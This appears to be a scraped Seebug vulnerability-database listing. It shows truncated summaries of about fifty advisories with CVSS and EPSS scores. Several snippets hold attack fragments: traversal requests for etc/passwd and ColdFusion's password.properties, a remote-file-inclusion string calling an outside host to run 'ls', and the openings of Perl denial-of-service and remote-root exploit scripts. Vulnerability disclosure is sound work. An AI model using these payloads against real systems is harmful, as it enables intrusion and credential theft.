Seebug | Most viewed

56796 matches found

seebug.org
added 2017/12/04 12:0 a.m. | 207 views

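TPshop Admin Backend Code Execution Vulnerability

0x01 Description: TPshop open-source shop system (short for Thinkphp shop) is a multi-merchant shop system developed by Shenzhen Soubao Network Co., Ltd. It suits enterprises and individuals who want to quickly build a customized online shop. It includes PC + iOS client + Android client + WeChat micro-shop; the PC front end and back end are cross-platform open-source software built on the ThinkPHP5 MVC architecture, designed to be very flexible, with a modular architecture and rich functionality, and easy to integrate seamlessly with third-party application systems. The design is quite comprehensive, and the modular architecture makes combining applications quite flexible and the functionality quite rich. Download: http://www.tp-shop.cn/Index/Index/download.html Rough directory structure ├─index.p...

7.1 AI score
Exploits: 0
seebug.org
added 2017/04/15 12:0 a.m. | 207 views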

ESKIMOROLL-ms14-068 Windows vulnerability in the Key Distribution Center (KDC) service (CVE-2014-6324)

Description: MS14-068 is a Windows vulnerability in the Key Distribution Center (KDC) service. It allows an authenticated user to insert an arbitrary PAC (a structure that represents all user rights) in its Kerberos ticket (the TGT). https://technet.microsoft.com/library/security/ms14-068.aspx In Windows...

9 CVSS | 6.8 AI score | 0.87448 EPSS
Exploits: 8
seebug.org
added 2017/02/10 12:0 a.m. | 207 views

OpenBSD http server - denial of service vulnerability(CVE-2017-5850)

No description provided by source. !/usr/bin/perl -w curl --limit-rate 1 --continue-at 1 --header "Host: www.example.com" http://target/10mb.fs use warnings; use IO::Socket; use Parallel::ForkManager; $numforks = 50; if $ARGV \n"; sub killhttpd print "ATTACKING $ARGV0 using $numforks forks\n"; $p...

7.8 CVSS | 7.5 AI score | 0.17203 EPSS
Exploits: 7
seebug.org
added 2015/11/09 12:0 a.m. | 207 views

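WordPress Brute Force via XMLRPC

Author: RickGray (Knownsec 404 Security Lab) Date: 2015-10-09 xmlrpc is the interface WordPress uses for remote calls, and using the xmlrpc interface for account brute forcing was proposed and exploited long ago. Recently SUCURI published an article describing how to use system.multicall in the xmlrpc interface to make brute forcing more efficient, so that thousands of username and password combinations can be attempted in a single request, greatly reducing the number of requests and, to some extent, evading detection in logs. Analysis: The code defining the xmlrpc service in WordPress is mainly located in wp-includes/class-IXR.php and...

7.1 AI score
Exploits: 0
seebug.org
added 2015/10/17 12:0 a.m. | 207 views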

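live800 Customer Service System Arbitrary File Download Vulnerability

Brief description: Posting a vulnerability in a spare moment; many large vendors use it, and the impact is considerable. Details: Fuzzing a live800 customer service site turned up a downlog.jsp file. Taking Huawei as an example: http://robotim.vmall.com/live800/downlog.jsp Based on the prompt, I guessed that downlog.jsp probably had not received a download path, so I continued fuzzing parameters: downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd ……...

7.1 AI score
Exploits: 0
seebug.org
added 2009/12/15 12:0 a.m. | 207 views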

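ProFTPD TLS Session Renegotiation Plaintext Data Injection Vulnerability

CVE ID: CVE-2009-3555 ProFTPD is an open-source FTP server program. ProFTPD's mod_tls module is affected by the OpenSSL session renegotiation vulnerability, allowing an attacker to insert plaintext data into the session data stream and manipulate the data exchange. ProFTPD Project ProFTPD 1.3.x Vendor patch: ProFTPD Project --------------- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page: http://www.proftpd.org/docs/RELEASENOTES-1.3.2c...

5.8 CVSS | 0.87264 EPSS
Exploits: 14
seebug.org
added 2021/07/22 12:0 a.m. | 206 views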

D-LINK DIR-3040 Service Component Uses Default Password (CVE-2021-21818)

The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed ...

5 CVSS | 7.8 AI score | 0.01948 EPSS
Exploits: 2
seebug.org
added 2021/06/21 12:0 a.m. | 206 views

Weaver E-mobile Front-End SQL Injection Vulnerability

...

0.8 AI score
Exploits: 0
seebug.org
added 2017/09/14 12:0 a.m. | 206 views

Hikvision IP Camera Access Bypass

Access control bypass in Hikvision IP Cameras Full disclosure Sep 12, 2017 Synopsis: --------------- Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014...

8 AI score
Exploits: 0
seebug.org
added 2016/07/01 12:0 a.m. | 206 views

IBOS Collaborative Office System misc.php SQL Injection

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2016/03/24 12:0 a.m. | 206 views

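TRS (ids, Old and New Versions) Design Flaw (XXE / User Information Disclosure Including Passwords)

Brief description: TRS ids design flaw, XXE / user information disclosure including passwords. I haven't posted a vulnerability in a long time; I came back to take a look and found that even the vulnerability submission page has changed. Details: First, let's look at the web.xml configuration file: ServiceServlet com.trs.idm.admin.service.ServiceServlet ServiceServlet /service Following into ServiceServlet: protected void serviceHttpServletRequest request, HttpServletResponse response throws ServletException, IOExceptio...

7 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 206 views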

HP-UX <= 10.20 newgrp Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=@; local$rv;...

7.1 AI score
Exploits: 0
seebug.org
added 2014/05/19 12:0 a.m. | 206 views

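Anymacro Mail System Latest Version SQL Injection Vulnerability

Brief description: The vendor keeps replying that it is not the latest version, so now I am poking a few holes in the latest version, thanks... Details: 0x001 anymacro is a fairly popular enterprise mail system in China, whose customers are mainly educational and government institutions. The SQL injection found today affects all Anymacro mail systems. 0x002 Vulnerability analysis: This was black-box testing... The vulnerable point is in the network disk: when downloading an attachment from it, the parameter is not validated, resulting in an SQL injection vulnerability https://mail.xxx.com/down.php?netdisk=1...

7.1 AI score
Exploits: 0
seebug.org
added 2014/03/13 12:0 a.m. | 206 views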

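Srun Software: Low-Value Vulnerabilities Lead to Getshell

Brief description: Low-value vulnerabilities in Srun software lead to getshell. Details: Several low-value vulnerabilities together resulted in getshell. This example uses the affected Shaanxi University of Science and Technology. 1. Path disclosure: http://xxxx.xx:8080/global.php, all instances disclose the path, although the actual path is /srun3/srun/services/ (1) port 80 path /srun3/web/ (2) port 8800 path /srun3/srun/services/ (3) port 8080/8081 path /srun3/srun/web/ 2. Admin backend (port 8080/8081), default password support...

7.1 AI score
Exploits: 0
seebug.org
added 2012/03/15 12:0 a.m. | 206 views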

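Microsoft Windows Remote Desktop Protocol (RDP) Remote Code Execution Vulnerability (MS12-020)

BUGTRAQ ID: 52353 CVE ID: CVE-2012-0002 The Remote Desktop Protocol (RDP) is a multi-channel protocol that lets a user (the client, or "local computer") connect to a computer providing Microsoft Terminal Services (the server, or "remote computer"). Windows has an error when handling certain objects: specially crafted RDP packets can access uninitialized or already deleted objects, leading to arbitrary code execution and then control of the system. 0 Microsoft Windows XP Professional Microsoft Windows XP Home Microsoft Windows Server...

9.3 CVSS | 9.2 AI score | 0.73924 EPSS
Exploits: 11
seebug.org
added 2007/03/16 12:0 a.m. | 206 views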

CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl CcMail 1.0 Remote File Inclusion Exploit Download Script http://www.cicoandcico.com/download/ccmail/ccmail1.0.1.tar.gz Bug Found & coded By CrackersChild [email protected] Kullanimi perl cra.pl perl cra.pl http://site.com/...

7.1 AI score
Exploits: 0
seebug.org
added 2021/05/26 12:0 a.m. | 205 views

VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21985)

Rapid7 May 26, 2021 5:34pm UTC 1 day ago • Last updated May 27, 2021 6:39pm UTC 7 hours ago Technical Analysis Threat status: Impending threat Attacker utility: Network infrastructure compromise Description On Tuesday, May 25, 2021, VMware published security advisory VMSA-2021-0010, which includes...

10 CVSS | 0.3 AI score | 0.99999 EPSS
Exploits: 58
seebug.org
added 2018/07/04 12:0 a.m. | 205 views

Major Vulnerabilities in Foscam Cameras

For the past several months, VDOO’s security research teams have been undertaking broad-scale security research of leading IoT products, from the fields of safety and security. In most cases, the research was carried out together with the device vendors for the sake of efficiency and transparency...

8.8 AI score | 0.04465 EPSS
Exploits: 7
seebug.org
added 2017/10/09 12:0 a.m. | 205 views

Dnsmasq Information Leak(CVE-2017-14494)

Sadly, there are no easy docker setup instructions available. Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client: python /poc.p...

4.3 CVSS | 8.2 AI score | 0.67549 EPSS
Exploits: 5
seebug.org
added 2016/03/13 12:0 a.m. | 205 views

Dahua Network Video Surveillance Device Weak Password Vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/05/13 12:0 a.m. | 205 views

Chengshi CMS v3.5 app/controllers/dance.php SQL Injection Vulnerability

0x01 Vulnerability details. Vulnerable page: app/controllers/dance.php public function so $data='';$datacontent=''; $fid = $this-security-xssclean$this-uri-segment3; //method $key = $this-security-xssclean$this-input-getpost'key', TRUE; //keyword $page = intval$this-input-get'p', TRUE; //page number if$page==0 $page=1;...

7.1 AI score
Exploits: 0
seebug.org
added 2008/06/23 12:0 a.m. | 205 views

MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability

No description provided by source. Bl@ckbe@rD 'Tunisian TerrorisT' ------------------------- $$$$$$$$$$$$$$$$$$$$$$$---------------------------------------- + Script Name : MVC-Web CMS 1.0 and 1.2 Remote SQL Injection Exploit |+| Team : InjEct0r5 + Author : Bl@ckbe@rD 'Tunisian TerrorisT' + Conta...

7.1 AI score
Exploits: 0
seebug.org
added 2007/08/23 12:0 a.m. | 205 views

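Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities

BUGTRAQ ID: 25316 CVE(CAN) ID: CVE-2007-3385,CVE-2007-3382 Apache Tomcat is a popular open-source JSP application server. Apache Tomcat has input validation vulnerabilities when handling user request data, which a remote attacker may exploit to obtain session-related sensitive information. Apache Tomcat does not correctly handle the “" ” character sequence in cookie values, and incorrectly treats single quotes in cookie values as delimiters; in some cases this may lead to disclosure of sensitive information such as the session ID. Apache Group Tomcat 6.0.0 - 6.0.13 Apache Group Tomcat 5.5.0...

4.3 CVSS | 5.6 AI score | 0.37497 EPSS
Exploits: 4
seebug.org
added 2017/11/28 12:0 a.m. | 204 views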

Exim Use-After-Free(CVE-2017-16943)

On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service D...

7.5 CVSS | 8.4 AI score | 0.6332 EPSS
Exploits: 9
seebug.org
added 2014/07/01 12:0 a.m. | 204 views

Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)

Adobe ColdFusion <=8.0 http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en (replace server with the target site) Update: 2017-04-28 This blog was written by Scott White, Senior Principal Security Consultant, Web Application Team Lead – TrustedSec TL;D...

7.5 CVSS | 9.5 AI score | 0.99721 EPSS
Exploits: 13
seebug.org
added 2014/07/01 12:0 a.m. | 204 views

MetaCart2 IntCatalogID Parameter Remote SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13382/info A remote SQL-injection vulnerability affects MetaCart2 because the application fails to properly sanitize user-supplied input before including it in SQL queries. An attacker may exploit this issue to manipulate...

7.1 AI score
Exploits: 0
seebug.org
added 2016/06/17 12:0 a.m. | 202 views

Discuz! x the use of SSRF remote command execution vulnerability

Content source: Security Think Tank. 0X01 Preparation: jannock disclosed a conditional remote command execution in Discuz that affects many large sites; the details have not been published online. jannock's brief explanation of the principle, seen on a security public account, is that it is an ssrf+redis/memcache issue,...

7.9 AI score
Exploits: 0
seebug.org
added 2016/01/14 12:0 a.m. | 202 views

Shop7z admin/lipinadd.asp Unauthorized Access

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 202 views

Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability

No description provided by source. Affected Application: Mambo phpShop v1.2 RC2b Mambo CMS Component . . : contact : . . . . . . . . . . . . . . . . . . . . . . . . . . . Discoverd/Found by: Charles Nelwan a.k.a Cmaster4 Team: BatamHacker irc.dal.net crew URL: http://www.batamhacker.info/forum...

7.1 AI score
Exploits: 0
seebug.org
added 2017/12/06 12:0 a.m. | 201 views

Claymore's Dual Ethereum Miner unauth stack buffer overflow(CVE-2017-16930)

VuNote =================== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16930 Version: 0.2 Date: Nov 30th, 2017 Tag: claymore dual ethereum decred crypto currency miner Overview -------- Name: Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner Vendor: nanopool/claymore...

10 CVSS | 10 AI score | 0.3434 EPSS
Exploits: 4
seebug.org
added 2017/04/28 12:0 a.m. | 201 views

Ruby on Rails 'implicit render' functionality Directory Traversal Vulnerability (CVE-2014-0130)

Impact ------ The implicit render functionality allows controllers to render a template, even if there is no explicit action with the corresponding name. This module does not perform adequate input sanitization which could allow an attacker to use a specially crafted request to retrieve arbitrary...

4.3 CVSS | 6.3 AI score | 0.53703 EPSS
Exploits: 2
seebug.org
added 2016/05/06 12:0 a.m. | 201 views

Tipask 2.5 /control/question.php SQL Injection Vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/11/12 12:0 a.m. | 201 views

Discuz 6.0 /my.php SQL Injection Vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 201 views

Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 201 views

Papoo CMS 3.2 IBrowser Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/19807/info Papoo CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious P...

7.1 AI score
Exploits: 0
seebug.org
added 2014/03/28 12:0 a.m. | 201 views

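Postfix Admin 'functions.inc.php' SQL Injection Vulnerability

BUGTRAQ ID: 66455 CVE(CAN) ID: CVE-2014-2655 Postfix is a mail transfer agent used on Unix-like operating systems. Because the program does not sufficiently filter user-supplied data before SQL queries, an attacker can compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 0 Postfix Admin Postfix Admin 2.3.5 Postfix Admin Postfix Admin 2.3.4 The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page: http://sourceforge.net/projects/postfixadmin/...

6.5 CVSS | 0.01848 EPSS
Exploits: 2
seebug.org
added 2014/03/14 12:0 a.m. | 201 views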

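Kentico CMS Username Disclosure Vulnerability

Kentico CMS is a content management system. Because the application does not restrict access to CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx, valid usernames can be disclosed. 0 Kentico CMS 7.x Kentico CMS version 7.0.78 fixes this vulnerability; users are advised to download and use it: http://www.kentico.com/...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 200 views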

EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability

No description provided by source. Title: EQdkp = 1.3.0 Remote File Inclusion URL: http://www.eqdkp.com/ Dork: powered by EQdkp Author: OLiBekaS greetz: Skulmatic, weleh, brockencode, and all papmahackerlink crew Exploit: /includes/dbal.php?eqdkprootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 200 views

CartWIZ 1.10 AddToCart.ASP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13330/info CartWIZ is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to utilizing the data in an SQL query. Successful exploitatio...

7.1 AI score
Exploits: 0
seebug.org
added 2013/07/22 12:0 a.m. | 200 views

SDCMS Design Flaw Allows Reading Arbitrary File Contents

Brief description: A design flaw in SDCMS allows traversal of arbitrary file contents. Details: 1. First, look at the flawed file: file /sdcms/admin/sdtheme.asp ...... Line 138: case "edit" dim filename:filename=sdcms.fget"filename",0 if notsdcms.checkstrfilename,"filename" then sdcms.echo "filename is wrong" sdcms.die end if if notsdcms.isfile"../theme/"&filename then sdcms.echo...

7 AI score
Exploits: 0
seebug.org
added 2009/11/27 12:0 a.m. | 200 views

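ISC BIND 9 DNSSEC Query Response Remote Cache Poisoning Vulnerability

BUGTRAQ ID: 37118 CVE(CAN) ID: CVE-2009-4022 BIND is a very widely used implementation of the DNS protocol, maintained by ISC, with the actual development done by Nominum. While resolving recursive client queries, a name server with DNSSEC validation enabled may incorrectly add records to its cache from the additional section of a received response, which is a cache poisoning condition...

2.6 CVSS | 0.4 AI score | 0.07952 EPSS
Exploits: 1
seebug.org
added 2017/12/12 12:0 a.m. | 199 views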

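Apache Synapse Remote Command Execution Vulnerability (CVE-2017-15708)

0X00 Introduction: Apache Synapse is a lightweight, high-performance Enterprise Service Bus (ESB). Powered by a fast, asynchronous mediation engine, Apache Synapse provides excellent support for XML, Web services and REST. 0X01 Analysis: As we know, two conditions must hold for a deserialization vulnerability: serialized object data is transmitted and deserialized, and a flawed third-party library is present, such as Apache Commons Collections. In a blog post, @breenmachine of the FoxGlove Security team gave a very thorough summary of where deserialization may be used: in HTTP requests; RMI, which always uses serialization and deserialization during transport...

0.8 AI score | 0.17741 EPSS
Exploits: 1
seebug.org
added 2016/11/08 12:0 a.m. | 199 views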

GitLab: Leak of Any User's Authentication Tokens Leads to Remote Code Execution

Vulnerability analysis reference: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores it in the project.json file. This object contains the authenticationtoken for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...

6.9 AI score
Exploits: 0
seebug.org
added 2016/01/13 12:0 a.m. | 199 views

EuseTMS plancommentlist.aspx type SQL Injection

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 199 views

wu-ftpd <= 2.6.1 - Remote Root Exploit

No description provided by source. / 7350wurm - x86/linux wuftpd remote root exploit TESO CONFIDENTIAL - SOURCE MATERIALS This is unpublished proprietary source code of TESO Security. The contents of these coded instructions, statements and computer programs may not be disclosed to third parties,...

7.1 AI score
Exploits: 0
seebug.org
added 2011/12/27 12:0 a.m. | 199 views

Lighttpd 1.4.30 / 1.5 Denial Of Service

No description provided by source. / Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang Here the vulnerable code...

5 CVSS | 9.6 AI score | 0.16246 EPSS
Exploits: 8
seebug.org
added 2011/08/10 12:0 a.m. | 199 views

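Microsoft Windows TCP/IP ICMP CVE-2011-1871 Remote Denial of Service Vulnerability

Bugtraq ID: 48987 CVE ID: CVE-2011-1871 Microsoft Windows is a popular operating system. The Windows TCP/IP stack does not correctly handle specially crafted sequences of ICMP messages; a remote attacker can exploit the vulnerability by sending specially crafted messages to make the system stop responding or restart automatically. Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista SP2 Microsoft Windows Server 2008 R2 x64 SP1 Microsoft Windows Server 2008 R2 x64 0 Microsoft...

7.8 CVSS | 6.3 AI score | 0.38461 EPSS
Exploits: 1
seebug.org
added 2008/09/01 12:0 a.m. | 199 views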

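VMware Consolidated Backup (VCB) User Password Information Disclosure Vulnerability

BUGTRAQ ID: 30937 CVE ID: CVE-2008-2101 CNCVE ID: CNCVE-20082101 VMware ESX Server is enterprise-class virtualization software. The VMware Consolidated Backup (VCB) command-line tools have a design issue that a local attacker can exploit to obtain user password information. The VCB command-line tools accept a password via the -p option; a user logged in to the service console can obtain the username and password information while the VCB command line is running. VMWare ESX Server 3.0.3 VMWare ESX Server 3.0.2 VMWare ES...

2.1 CVSS | 6.7 AI score | 0.0038 EPSS
Exploits: 1
seebug.org
added 2006/12/27 12:0 a.m. | 199 views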

myPHPCalendar 10192000b (cal_dir) Remote File Include Vulnerabilities

No description provided by source. script name : myPHPCalendar Script Downloads : http://freshmeat.net/projects/myphpcalendar/ Web Site : http://myphpcalendar.sourceforge.net/ Version : 10.1 Risk : High Found By : Cr@zyKing Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | TheBekir |...

7.1 AI score
Exploits: 0
seebug.org
added 2006/12/06 12:0 a.m. | 199 views

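Mambo Gallery Manager MosConfig_Absolute_Path Remote File Inclusion Vulnerability

Mambo Gallery Manager is a Mambo-based image gallery program. Mambo Gallery Manager does not correctly filter user-submitted URI data; a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'help.mgm.php' script lacks filtering of the user-submitted "mosConfigabsolutepath" parameter; supplying a malicious remote server as the include target can result in arbitrary PHP code being executed with the privileges of the web process. Mambo Mambo Gallery Manager Component 0.95 r3 http://mamboxchange.com/projects/mgm/...

7.1 AI score
Exploits: 0
Total number of security vulnerabilities: 5000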